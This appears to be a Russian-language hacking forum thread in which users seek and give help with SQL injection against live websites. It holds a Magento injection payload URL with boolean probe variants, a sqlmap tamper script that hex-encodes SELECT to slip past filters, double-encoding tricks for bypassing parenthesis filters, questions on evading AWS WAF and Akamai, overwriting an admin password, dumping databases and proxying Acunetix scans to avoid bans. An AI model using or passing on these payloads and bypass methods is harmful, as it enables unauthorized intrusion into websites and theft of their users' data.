--is-dba: True. Могу я изменить пароль админа? Какая команда должна быть? Есть несколько баз данных, текущая 'admin' в ней таблица 'users' и колонку пароль 'password'. Я попробовал так --sql-query "UPDATE users SET password = '123' WHERE email = '[email protected]';" Выбило ошибку "execution of non-query SQL statements is only available when stacked queries are supported". Как правильно сделать?
как обойти WAF/IPS identified as 'AWS WAF (Amazon)' Array ( [0] => Array ( [0] => 42000 [SQLSTATE] => 42000 [1] => 8114 Code: => 8114 [2] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int. [message] => [Microsoft][ODBC Driver 17 for SQL Server][SQL Server]Error converting data type nvarchar to int. ) )
Подскажите пожалуйста , Акунетикс нашел вот такую уязвимость Magento (2.2.0 to 2.3.0) Unauthenticated SQL Injection Vulnerability нашел видос и пару статей как раскрутить вот к примеру но ничего не выходт вот как выглядит https:// site.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+3*3>8)+--+- или я что то не так делаю, может кто подскажет какие варианты еще есть или команды, или там вообще нет уязвимости
Гадать на кофейной гуще? Что вам говорит site/magento_version Что получаете в ответ когда шлёте Code: )))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=1)+--+- и что получаете Code: )))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1=0)+--+- Первоисточник
Привет помогите! Через SQLmap в PostgreSQL создал --sql-shell как мне сохранить output запросов? SQLmap стандартным способом сохраняет но через --dump мне не выдает ничего только через sql-shell
подскажите , че это такое? available databases [7]: [*] `\\[email protected]\xdc\xff\xfbt\xb7?\xfd\xff\xff\xa0? "@<\x80\xff\xfe\xeb\xe3\xff/ \xc0\xd4\xa3` [*] ` \xff\xe7\xce?\xff\xf9\x89?\xfe\xe8?\xf1\xfe\x84\x9c\x87!р\xe8\xb2A\xff\x84$\xe46\x81` [*] `\xff\xfe~\x80\xff\xfe$\x8f\xfc\xff \xfd\xf\xfb\xd2?\xff\xff8\[email protected]\xe0\xa0\xf0{n\xbX\xf8!` [*] `>>@?\xf1W\x8f\xa0#\xff\[email protected]\xf2?\xfe\xe8\xff\xc8\xf9\xf9\xe4c\xfa;7:\xbc\x80\xeb\x83\xf` [*] `\xfc\xff\xc8\xf3\xfc\xa0\xe3\xe4\xd0?\xff\xc8\xff\x84>1\xe2\x909\xfc \xfe?\xca\xd8+\xf0V` [*] `\xfc \xc8\xfcD\x81▒\xff\xe8\xff\xf8\xff \x85 \xc4\xff\x9f\xfa\xf3\xf1NH\xe3\xe2\xb9 \xa2\xe1 \x801\xfb\xa0` [*] `\xfc \xff\xff\xfa\xbf\xc8?\x8f ? ?\xff\xfa$8\xff\xfb?\xff\xe4\xff\xff\xfe1 \xff\xfc\xe1G\xf9^\xe0\xffq\xc1`
Насколько я понимаю, это звания баз данных в неправильной кодировке. Можете посмотреть используемую кодировку с помощью Code: SELECT SCHEMA_NAME 'database', default_character_set_name 'charset', DEFAULT_COLLATION_NAME 'collation' FROM information_schema.SCHEMATA;
Приветствую. Русские слова/буквы дампятся из БД в таком виде: вапми Английские слова и буквы при этом в нормальном виде. Кто то может подсказать как сдампить данные на русском языке в нормальном виде?
Добрый день куда копать дальше? <font color='red'><b>������ ���������� ������� SELECT * FROM `m_services` WHERE pay = ''' AND id_device='0' AND type!='provider' AND active='1' ORDER BY id</b></font><br /><div class='end_section'>
как из boolean-based blind (false positive) сделать union, указать количество колонок (--union-cols=) в current bd или во всех БД?
Что-то мне не понятна суть вопроса, во первых "false positive" вроде как говорит о том что там вовсе и нету скули? К тому же даже если у вас и есть скуля, то она же слепая (boolean-based blind) и что тогда вам даст данные из других таблиц через UNION?
подскажите что написать в коде темпера для того чтоб он при запросах менял select на %53%45%4c%45%43%54 я попробовал сделать вот так: Code: #!/usr/bin/env python """ Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ import os import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.HIGHEST def dependencies(): pass def tamper(payload, **kwargs): """ Reference: Notes: Examples: """ retVal = payload if payload: retVal = re.sub(r"\s*SELECT\s*", " %53%45%4c%45%43%54 ", retVal) return retVal но при запуске он мне пишет [CRITICAL] missing function 'tamper(payload, **kwargs)' in tamper script помогите плиз
пипл сори что не по теме , не могу найти нужную.. и я и много людей тут спрашивали по поводу уязвимостей сканом из Acunetix . Пожалуйста подскажите как через прокси пустить скан , ну что бы не банило ип при скане и не зависал скан, я имею в виду в веб. Извиняюсь еще раз что не в этой теме , подскажите пожалуйста.
кто нибудь знает как можно обойти фильтры на ()? it appears that some non-alphanumeric characters (i.e. ()) are filtered by the back-end server.
Да вроде работает ваш скрипт, скопипастил, запустил и выполняется без ошибок, может у вас где-то таб вместо пробела? Может быть двойная кодировка поможет '(' -> %28 -> %25%32%38 Если идёт сначала фильтр, то попробовать '%2(8' тогда после фильтра '(' останется '%28' -> '('
А как быть когда dbms = INFORMIX ? https://prnt.sc/w9vw7e 2. Какие на сегодня существуют методы обхода AKAMAI ? ПЫСЫ: fandor9 , случаем платных консультаций не оказываете?